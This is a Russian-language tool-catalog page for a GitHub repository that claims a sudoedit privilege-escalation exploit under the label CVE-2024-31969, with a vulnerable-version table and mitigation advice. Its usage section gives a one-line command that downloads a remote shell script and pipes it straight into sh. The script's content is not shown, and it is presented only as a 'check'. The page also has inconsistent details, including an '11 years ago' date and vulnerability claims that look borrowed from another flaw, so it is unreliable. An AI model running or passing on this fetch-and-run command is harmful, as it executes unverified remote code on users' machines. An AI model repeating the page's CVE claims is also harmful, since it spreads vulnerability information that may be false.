Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/kingfakee7/cve-2024-31969
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и Образование
GitHubkingfakee7/cve-2024-31969

CVE-2024-31969

CVE-2024-31969 — это локальное повышение привилегий в sudo при использовании sudoedit.

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

📌 CVE-2024-31969

CVE-2024-31969 – это уязвимость local privilege escalation в sudo при использовании команды sudoedit.

Эта уязвимость была введена в sudo 1.9.0 из-за некорректного способа, которым sudoedit проверяет переменные окружения пользователя и права собственности на файлы.


📖 Описание

Недостаток, появившийся в sudo 1.9.0, в методе проверки sudoedit переменных окружения пользователей и прав собственности на файлы.

Эта уязвимость позволяет локальному пользователю с доступом sudoedit изменять произвольные файлы с правами root путем манипуляции переменными окружения, такими как SUDO_EDITOR, или с помощью символьных ссылок (symlink).


📊 Затронутые версии Sudo:

Версия SudoСтатус
1.9.0 → 1.9.15p4🔥 Уязвима
1.9.15p5 и выше✅ Безопасна
1.8.x (включая 1.8.23)❌ Не затронута

📦 Установка и использование

Выполните следующую команду:

root@kitploit:~
curl -L https://raw.githubusercontent.com/kingfakee7/CVE-2024-31969/main/cve-2024-31969-check.sh | sh

🛠️ Решение / Смягчение

  • Обновите sudo до версии 1.9.15p5 или новее.
  • Ограничьте правила sudoers, которые разрешают sudoedit для пользователей, не являющихся root.
  • Используйте безопасную конфигурацию env_keep или env_reset в файле /etc/sudoers.

📚 Ссылки

  • CVE-2024-31969 на NVD

⚠️ Отказ от ответственности

Этот репозиторий создан в образовательных целях и для документации по безопасности систем.
Строго запрещено использовать эту информацию для незаконных действий или без письменного разрешения владельца системы.
Любые формы злоупотребления полностью находятся вне ответственности создателя.

Скачать инструмент